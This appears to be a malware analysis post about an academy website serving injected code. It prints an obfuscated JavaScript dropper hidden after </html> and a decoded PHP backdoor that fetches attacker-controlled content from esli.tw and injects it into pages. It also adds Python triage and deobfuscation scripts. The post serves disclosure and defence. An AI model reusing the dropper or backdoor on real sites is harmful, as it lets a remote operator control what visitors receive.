
Choongang Information Processing Academy (중앙정보처리학원) → http://it.choongang.co.kr is distributing a malicious script!!

Original location: http://it.choongang.co.kr/curri/curri_week.asp?m=2


Two distinct scripts are present in the injected code: an obfuscated JavaScript block appended after </html>, which hex-decodes and XORs the contents of a hidden textarea and then eval()s the result, and a base64-encoded PHP snippet!


</script>
</body>
</html><textarea id="uxi" style="display:none;">717a766078707b613b62677c[omitted]5b372e</textarea><script>sgon="var wkoder = 'Stri'+'ng.f'+'rom'+'Char'+'Code'; wkoder2 = '78'; function fs(){bah=eval('Ma'+'t'+'h.P'+'I');mg=eval('p'+'arseI'+'nt');qcsjh='le'+'ng'+'th';mjeal=mg(~((bah&bah)|(~bah&bah)&(bah&~bah)|(~bah&~bah)));ybr=mg(((mjeal&mjeal)|(~mjeal&mjeal)&(mjeal&~mjeal)|(~mjeal&~mjeal))&1);sehihn=ybr<<ybr;flh=mjeal;flh=mjeal;lma='';teyrh=eval(wkoder);egxf=eval;for(uxsasv=mjeal;uxsasv<sgon[qcsjh];uxsasv-=-ybr)flh+=eval('sgon.ch'+'arCod'+'eA'+'t(uxsasv)');flh%=[omitted](1<<6)));for(uxsasv=mjeal;uxsasv<document.getElementById('uxi').value[qcsjh];uxsasv+=sehihn)lma+=teyrh(mg(mjeal+unescape('%'+wkoder2)+document.getElementById('uxi').value.charAt(uxsasv)+document.getElementById('uxi').value.charAt(uxsasv+mg(ybr)))^flh);try{egxf(lma);}catch(e){try{eval(lma);}catch(e) {window.location='/';}}}try{eval('fs();')}catch(e) {alert('e'+'rr');}";eval(sgon);</script>


eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczsNCmNsYXNzIEdldExpbmtzDQp7DQoJdmFyICRob3N0ID0gImVzbGkudHciOw0KCXZhciAk[omitted]wYWdlID0gZXhwbG9kZSgiXHJcblxyXG4iLCAkYnVmZik7DQogIAkJCXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ=='));?>



First, decoding the BASE64 script!

It comes out as PHP!

It is not a fully fledged PHP shell (the visible code contains no command execution), but it does act as a backdoor of sorts: the GetLinks class below asks http://esli.tw/link.php?site=<the victim's HTTP_HOST> for content at most once an hour, caches the reply in cashe.txt, and echoes it straight into the page unfiltered. Whoever controls esli.tw can therefore change what every visitor receives without touching the compromised server again.


error_reporting(0);                      // hide any warnings the injected code produces

$links = new GetLinks();
echo $links->Links;                      // remote-supplied HTML lands in the page here

class GetLinks
{
    var $host = "esli.tw";               // operator's server
    var $path = "/link.php?site=";       // the victim hostname is appended as the parameter
    var $site = "";
    var $user_agent = "";

    var $Links = "";

    var $_socket_timeout  = 12;
    var $_cashe_life_time = 3600;        // re-fetch at most once an hour
    var $_cashe_file      = "cashe.txt"; // cached copy kept on the compromised host

    function GetLinks()
    {
        // fetch when there is no cache, the cache is older than an hour, or it is empty
        if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
            $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
            $this->user_agent = $_SERVER['HTTP_USER_AGENT'];
            $this->Links = $this->fetch_remote_file();
            if ($handle = fopen($this->_cashe_file, 'w')) {
                fwrite($handle, $this->Links);
            }
            [omitted]
            fclose($handle);
        }
        else {
            $this->Links = file_get_contents($this->_cashe_file);
        }
    }

    function fetch_remote_file()
    {
        $buff = '';
        // raw HTTP/1.1 GET to http://esli.tw/link.php?site=<HTTP_HOST>
        $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
        if (!$fp) {

        } else {
            $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
            $out .= "Host: {$this->host}\r\n";
            $out .= "Connection: Close\r\n\r\n";

            fwrite($fp, $out);
            while (!feof($fp)) {
                $buff .= fgets($fp, 128);
            }
            fclose($fp);
            // drop the response headers; return the body verbatim
            $page = explode("\r\n\r\n", $buff);
            return $page[1];
        }
    }
}
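As an added example (not the post's code, and not the malware's), here is a small Python triage script for the two indicators this infection leaves behind: PHP hidden inside eval(base64_decode('...')) like the class above, and markup appended after </html> consisting of a display:none textarea followed by a script that eval()s. The PHP it scans is a constructed, shortened stand-in for the decoded class; the infected page is constructed too, the only page-derived input being the visible hex prefix of the textarea. Function and report-key names are my own.

```python
"""Added example (not from the original post): triage for the two injection
patterns on this page, PHP hidden in eval(base64_decode('...')) and a hidden
textarea + eval() script appended after </html>."""
import base64
import binascii
import re
from typing import Dict, List, Optional

EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.S)
HIDDEN_TEXTAREA_EVAL = re.compile(
    r"<textarea[^>]*display:\s*none.*?</textarea>.*?<script>.*?eval\s*\(", re.S | re.I)
# var $name = "value";  -- the GetLinks knobs: host, path, cache file
PHP_STRING_PROP = re.compile(r"""\$(\w+)\s*=\s*['"]([^'"]*)['"]\s*;""")

# Constructed, shortened stand-in for the decoded GetLinks class on this page.
SAMPLE_DECODED_PHP = """error_reporting(0);
$links = new GetLinks();
echo $links->Links;
class GetLinks
{
    var $host = "esli.tw";
    var $path = "/link.php?site=";
    var $_cashe_file = "cashe.txt";
    function GetLinks()
    {
        $this->site = $_SERVER['HTTP_HOST'];
        $this->Links = $this->fetch_remote_file();
    }
    function fetch_remote_file()
    {
        $fp = fsockopen($this->host, 80);
    }
}
"""
SAMPLE_PHP_FILE = ("<?php eval(base64_decode('"
                   + base64.b64encode(SAMPLE_DECODED_PHP.encode()).decode() + "'));?>")

# Constructed page: legitimate markup, then the dropper appended after </html>.
# Only the hex prefix is taken from the analysed page.
SAMPLE_INFECTED_PAGE = (
    "<html><body>course schedule</body></html>"
    '<textarea id="uxi" style="display:none;">717a766078707b613b62677c</textarea>'
    '<script>sgon="...";eval(sgon);</script>')


def decode_eval_b64(src: str) -> List[str]:
    """Plaintext of every eval(base64_decode('...')) found in src."""
    decoded = []
    for blob in EVAL_B64.findall(src):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", blob))
        except binascii.Error:
            continue  # truncated or corrupted blob (the page's own is cut with [omitted]): review by hand
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def php_indicators(php: str) -> Dict[str, str]:
    """The knobs an incident responder wants from a decoded GetLinks-style class."""
    props = dict(PHP_STRING_PROP.findall(php))
    ind: Dict[str, str] = {}
    if "host" in props and "path" in props:
        ind["beacon_url"] = f"http://{props['host']}{props['path']}<HTTP_HOST>"
    if "_cashe_file" in props:
        ind["cache_file"] = props["_cashe_file"]
    if "fsockopen(" in php:
        ind["egress"] = "fsockopen"
    if "$_SERVER['HTTP_HOST']" in php:
        ind["victim_host_in_request"] = "yes"
    return ind


def find_tail_injection(html: str) -> Optional[str]:
    """Whatever follows the last </html>, if it looks like the textarea + eval dropper."""
    parts = re.split(r"</html\s*>", html, flags=re.I)
    if len(parts) < 2:
        return None
    tail = parts[-1]
    return tail if HIDDEN_TEXTAREA_EVAL.search(tail) else None


def triage(src: str) -> Dict[str, object]:
    """Run both checks over one file's contents and collect the findings."""
    report: Dict[str, object] = {"eval_b64": [], "indicators": {}, "tail_injection": None}
    for php in decode_eval_b64(src):
        report["eval_b64"].append(php)
        report["indicators"].update(php_indicators(php))
    report["tail_injection"] = find_tail_injection(src)
    return report


if __name__ == "__main__":
    print(triage(SAMPLE_PHP_FILE)["indicators"])
    print(triage(SAMPLE_INFECTED_PAGE)["tail_injection"])
```

Run it over every file under the web root, not just .php: the page above is .asp and still carried both payloads. The beacon_url and cache_file values are what you block at the egress proxy and delete from disk; a base64 blob that fails to decode (truncated, like the [omitted] one on this page) is reported as nothing rather than half a result, so check such files by hand.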


When the first (JavaScript) payload is decoded, it connects to:

http://today-newday.cn/in.cgi?6&parameter=newday

=========================
Server IP(s):
0.0.0.0
=========================

The connection is attempted, but the page is currently dead!
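As an added example (not the post's code), here is a Python deobfuscator for the scheme the first payload uses. It reproduces the key derivation in the script (the sum of the char codes of the whole `sgon` string; the page shows `flh%=[omitted](1<<6)`, so the modulus is a parameter and 1<<6 is only an assumed placeholder), the per-byte `parseInt('0x' + pair) ^ key` decode, and a 256-key brute force that needs neither the modulus nor the complete script. The `sgon` stand-in, the iframe payload and the surrounding HTML are constructed; the one page-derived input is the visible hex prefix 717a766078707b613b62677c, which the brute force decodes to `document.wri` under key 0x15.

```python
"""Added example (not from the original post): undoing the hidden-textarea XOR scheme.

The injected script keeps its payload as hex pairs in a display:none <textarea>,
derives a one-byte key from the char codes of the decoder string `sgon` itself,
and rebuilds each byte as parseInt('0x' + pair) ^ key before eval'ing the result.
"""
import re
from typing import Dict, Optional, Tuple

# Visible start of the textarea on the analysed page; the middle is omitted there.
VISIBLE_HEX_PREFIX = "717a766078707b613b62677c"

# Constructed stand-in for `sgon` (the real one is partially omitted on the page).
SAMPLE_SGON = ("var wkoder = 'Stri'+'ng.f'+'rom'+'Char'+'Code'; wkoder2 = '78'; "
               "function fs(){ /* ... */ eval(lma); }")

# Constructed payload: the page only says the script ends up contacting this URL,
# so wrapping it in an iframe is an assumption.
SAMPLE_PAYLOAD = ('<iframe src="http://today-newday.cn/in.cgi?6&parameter=newday" '
                  'width="1" height="1"></iframe>')

# The page shows `flh%=[omitted](1<<6)`; the exact modulus is unknown. Assumed here.
ASSUMED_MODULUS = 1 << 6

# Substrings whose presence marks a plausible decode of a web-injection payload.
MARKERS = ("<script", "<iframe", "http://", "document.", "unescape(", "eval(")


def derive_key(sgon: str, modulus: int) -> int:
    """flh += sgon.charCodeAt(i) over the whole script, then flh %= modulus.

    The sum covers the decoder itself, so editing the script (turning eval into
    alert to watch the payload, say) changes the key and breaks decoding.
    """
    return sum(ord(ch) for ch in sgon) % modulus


def encode_payload(payload: str, key: int) -> str:
    """Inverse of the decoder: XOR each byte with the key and emit hex pairs."""
    return "".join(f"{ord(ch) ^ key:02x}" for ch in payload)


def decode_textarea(hex_text: str, key: int) -> str:
    """parseInt('0x' + two chars) ^ key, stepping two characters at a time."""
    return "".join(chr(int(hex_text[i:i + 2], 16) ^ key)
                   for i in range(0, len(hex_text), 2))


def extract_textarea_hex(html: str) -> Optional[str]:
    """Pull the hex blob out of a hidden <textarea> such as the one appended after </html>."""
    m = re.search(r'<textarea[^>]*display:\s*none[^>]*>\s*([0-9a-fA-F]+)\s*</textarea>', html)
    return m.group(1) if m else None


def brute_force_key(hex_text: str) -> Tuple[int, str]:
    """Try all 256 single-byte keys; prefer printable output carrying known markers.

    Sidesteps the self-checksum: no modulus and no unmodified script required,
    and it works on a truncated blob like the one reproduced on the page.
    """
    best_key, best_text, best_score = 0, "", -1
    for key in range(256):
        text = decode_textarea(hex_text, key)
        score = sum(1 for ch in text if 32 <= ord(ch) < 127 or ch in "\r\n\t")
        lowered = text.lower()
        score += 100 * sum(marker in lowered for marker in MARKERS)
        if score > best_score:
            best_key, best_text, best_score = key, text, score
    return best_key, best_text


def round_trip(payload: str = SAMPLE_PAYLOAD, sgon: str = SAMPLE_SGON) -> Dict[str, object]:
    """Encode exactly as the malware would, then recover the payload both ways."""
    key = derive_key(sgon, ASSUMED_MODULUS)
    hex_text = encode_payload(payload, key)
    html = ('</html><textarea id="uxi" style="display:none;">' + hex_text
            + '</textarea><script>sgon="...";eval(sgon);</script>')
    found = extract_textarea_hex(html) or ""
    brute_key, brute_text = brute_force_key(found)
    return {"key": key, "with_key": decode_textarea(hex_text, key),
            "brute_key": brute_key, "brute_text": brute_text}


if __name__ == "__main__":
    k, txt = brute_force_key(VISIBLE_HEX_PREFIX)
    print(f"visible prefix: key=0x{k:02x} -> {txt!r}")
    print(round_trip())
```

The self-checksum is the detail worth noticing: because the key is computed over the decoder's own text, the usual trick of patching eval to alert in the page changes the key and the decode silently fails (the script then falls through to window.location='/'). Brute-forcing the single byte avoids the problem entirely, and with printable-text plus marker scoring it recovers 0x15 and "document.wri" from nothing more than the 12 bytes of hex the post reproduces.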